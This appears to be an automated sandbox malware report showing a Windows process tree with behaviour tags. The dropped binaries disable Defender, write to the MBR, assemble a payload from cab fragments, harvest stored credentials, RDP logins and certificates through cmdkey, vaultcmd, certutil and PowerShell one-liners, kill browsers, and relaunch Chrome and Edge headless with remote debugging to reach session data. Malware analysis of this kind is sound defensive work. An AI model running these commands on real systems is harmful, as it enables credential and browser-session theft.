C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4004 -prefsLen 25213 -prefMapHandle 4008 -prefMapSize 270279 -jsInitHandle 4012 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4020 -initialChannelId {f27bc7dc-38f2-43c3-97dd-2d98f9c84f05} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab8⤵
- Checks processor information in registry
PID:1232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4176 -prefsLen 27325 -prefMapHandle 4180 -prefMapSize 270279 -ipcHandle 4244 -initialChannelId {04e79b99-6bb3-45f6-a753-8f482ada4c0b} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd8⤵PID:3640
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3156 -prefsLen 34824 -prefMapHandle 2980 -prefMapSize 270279 -jsInitHandle 3524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1680 -initialChannelId {2137c7d2-0516-42a0-92bc-d16613dfaa34} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab8⤵
- Checks processor information in registry
PID:5768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4668 -prefsLen 35012 -prefMapHandle 5064 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {9113f7b3-3966-41b8-bddf-c4a4250e6dfb} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility8⤵
- Checks processor information in registry
PID:7560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5324 -prefsLen 32952 -prefMapHandle 5328 -prefMapSize 270279 -jsInitHandle 5332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5336 -initialChannelId {acc30cd9-6a12-4dd9-9198-93b3b793a975} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab8⤵
- Checks processor information in registry
PID:7836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5328 -prefsLen 32952 -prefMapHandle 5324 -prefMapSize 270279 -jsInitHandle 5384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5556 -initialChannelId {107bf615-504c-4775-85a0-a7c6cedbafb2} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab8⤵
- Checks processor information in registry
PID:7848
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5716 -prefsLen 32952 -prefMapHandle 5720 -prefMapSize 270279 -jsInitHandle 5724 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {4e0ba08f-77a1-4d63-b3c3-e2360a3e6965} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab8⤵
- Checks processor information in registry
PID:7860
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417020101\9220b9dffd.exe"C:\Users\Admin\AppData\Local\Temp\10417020101\9220b9dffd.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\10417030101\ca8acd6286.exe"C:\Users\Admin\AppData\Local\Temp\10417030101\ca8acd6286.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5092 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:4516
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5368
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417040101\3514bb24fc.exe"C:\Users\Admin\AppData\Local\Temp\10417040101\3514bb24fc.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5200
-
-
C:\Users\Admin\AppData\Local\Temp\10417050101\3sZiUQa.exe"C:\Users\Admin\AppData\Local\Temp\10417050101\3sZiUQa.exe"5⤵
- Executes dropped EXE
PID:6368
-
-
C:\Users\Admin\AppData\Local\Temp\10417060101\91c4598add.exe"C:\Users\Admin\AppData\Local\Temp\10417060101\91c4598add.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6576
-
-
C:\Users\Admin\AppData\Local\Temp\10417070101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10417070101\h8NlU62.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6820
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417080101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10417080101\XOPPRUc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:724 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5560
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417090101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10417090101\7IIl2eE.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3744 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat6⤵
- System Location Discovery: System Language Discovery
PID:376 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7900
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"7⤵
- System Location Discovery: System Language Discovery
PID:6032
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6028
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"7⤵
- System Location Discovery: System Language Discovery
PID:3624
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183777⤵
- System Location Discovery: System Language Discovery
PID:216
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab7⤵
- System Location Discovery: System Language Discovery
PID:5344
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation7⤵
- System Location Discovery: System Language Discovery
PID:620
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com7⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N7⤵
- System Location Discovery: System Language Discovery
PID:5456
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4836
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵
- System Location Discovery: System Language Discovery
PID:4576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417100101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10417100101\captcha.exe"5⤵
- Executes dropped EXE
- Enumerates connected drives
PID:8096 -
C:\Windows\system32\cmd.exe"cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3539616762.txt\""6⤵
- NTFS ADS
PID:7916
-
-
C:\Windows\system32\net.exe"net" statistics workstation6⤵PID:3632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 statistics workstation7⤵PID:5296
-
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list6⤵PID:2920
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FO CSV /NH6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6188
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5840
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:740 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list7⤵PID:6584
-
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6452
-
-
C:\Windows\system32\certutil.exe"certutil" -store My6⤵PID:6712
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My6⤵PID:6748
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6872
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "6⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious use of AdjustPrivilegeToken
PID:7144
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7192
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:7328
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.746⤵PID:7404
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7524
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7576
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7608
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6136
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5952
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6892
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6224
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6220
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6240
-
-
C:\Windows\system32\tasklist.exe"tasklist"6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6484
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6536
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe6⤵
- Kills process with taskkill
PID:740
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM Discord.exe6⤵
- Kills process with taskkill
PID:2408
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe6⤵
- Kills process with taskkill
PID:6532
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordCanary.exe6⤵
- Kills process with taskkill
PID:6528
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe6⤵
- Kills process with taskkill
PID:6764
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordPTB.exe6⤵
- Kills process with taskkill
PID:6820
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe6⤵
- Kills process with taskkill
PID:6828
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM DiscordDevelopment.exe6⤵
- Kills process with taskkill
PID:6884
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵
- Kills process with taskkill
PID:6876
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe6⤵
- Kills process with taskkill
PID:7188
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe6⤵
- Kills process with taskkill
PID:7256
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe6⤵
- Kills process with taskkill
PID:7172
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe6⤵
- Kills process with taskkill
PID:7016
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe6⤵
- Kills process with taskkill
PID:7364
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe6⤵
- Kills process with taskkill
PID:7468
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe6⤵
- Kills process with taskkill
PID:7192
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe6⤵
- Kills process with taskkill
PID:7476
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe6⤵
- Kills process with taskkill
PID:7776
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe6⤵
- Kills process with taskkill
PID:4444
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe6⤵
- Kills process with taskkill
PID:7536
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe6⤵
- Kills process with taskkill
PID:4376
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe6⤵
- Kills process with taskkill
PID:7576
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe6⤵
- Kills process with taskkill
PID:4856
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe6⤵
- Kills process with taskkill
PID:1564
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe6⤵
- Kills process with taskkill
PID:1492
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"6⤵
- Enumerates processes with tasklist
PID:7996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=48988 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default6⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
PID:2820 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb56e5dcf8,0x7ffb56e5dd04,0x7ffb56e5dd107⤵PID:8056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2328,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2320 /prefetch:27⤵
- Modifies registry class
PID:1508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2408,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2404 /prefetch:37⤵PID:5844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2424,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2416 /prefetch:87⤵PID:4528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48988 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2968,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2964 /prefetch:17⤵
- Uses browser remote debugging
PID:1628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48988 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3176 /prefetch:17⤵
- Uses browser remote debugging
PID:6188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48988 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3880,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3940 /prefetch:17⤵
- Uses browser remote debugging
PID:7960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4564,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4560 /prefetch:87⤵PID:4908
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq chrome.exe"6⤵
- Enumerates processes with tasklist
PID:6232
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe6⤵
- Kills process with taskkill
PID:6552
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"6⤵
- Enumerates processes with tasklist
PID:7276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=43708 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default6⤵
- Uses browser remote debugging
PID:7148 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=43708 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --edge-skip-compat-layer-relaunch7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:7212 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x22c,0x230,0x234,0x228,0x23c,0x7ffb485df208,0x7ffb485df214,0x7ffb485df2208⤵PID:7352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2728,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2716 /prefetch:28⤵
- Modifies registry class
PID:7552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2952,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2944 /prefetch:38⤵PID:6948
-
-
